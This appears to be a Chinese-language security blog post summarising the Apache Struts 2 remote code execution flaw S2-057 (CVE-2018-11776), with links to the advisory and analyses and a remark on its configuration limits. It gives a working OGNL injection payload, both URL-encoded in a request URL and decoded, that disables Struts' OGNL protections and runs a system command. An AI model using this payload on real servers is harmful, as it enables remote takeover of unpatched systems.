Neurohazard
暮雲煙月,皓首窮經;森羅萬象,如是我聞。

Apache Struts 2 RCE S2-057 (CVE-2018-11776)

wpadmin~August 23, 2018 /InfoSec

Apache Struts 2 RCE S2-057 (CVE-2018-11776)

简要说明

远程代码执行
Apache Struts 2 RCE S2-057 (CVE-2018-11776)
https://cwiki.apache.org/confluence/display/WW/S2-057

漏洞详情
https://lgtm.com/blog/apache_struts_CVE-2018-11776

测试环境
https://github.com/jas502n/St2-057

S2-057原理分析与复现过程(POC)原创: gyyyy 猎户攻防实验室 2018-08-23 link

其他补充(转载)

补充1

关于 CVE-2018-11776/S2-057

在 struts2 源代码中通配符属性配置默认是 false。

<constant name="struts.mapper.alwaysSelectFullNamespace" value="false" />

因此 S2-057 攻击还是有一定的局限性。

(各种平台,公众号都说紧急,吓的差点回去应急。)

补充2

@阿烨

http://192.168.44.1:8080/struts2-showcase/%24%7b(%23dm%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23ct%3d%23request%5b%27struts.valueStack%27%5d.context).(%23cr%3d%23ct%5b%27com.opensymphony.xwork2.ActionContext.container%27%5d).(%23ou%3d%23cr.getInstance(%40com.opensymphony.xwork2.ognl.OgnlUtil%40class)).(%23ou.getExcludedPackageNames().clear()).(%23ou.getExcludedClasses().clear()).(%23ct.setMemberAccess(%23dm)).(%23cmd%3d%40java.lang.Runtime%40getRuntime().exec(%22calc%22))%7d/actionChain1.action

关键 payload

${(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#ct=#request['struts.valueStack'].context).(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#cmd=@java.lang.Runtime@getRuntime().exec("calc"))}

Leave a Reply

Your email address will not be published. Required fields are marked *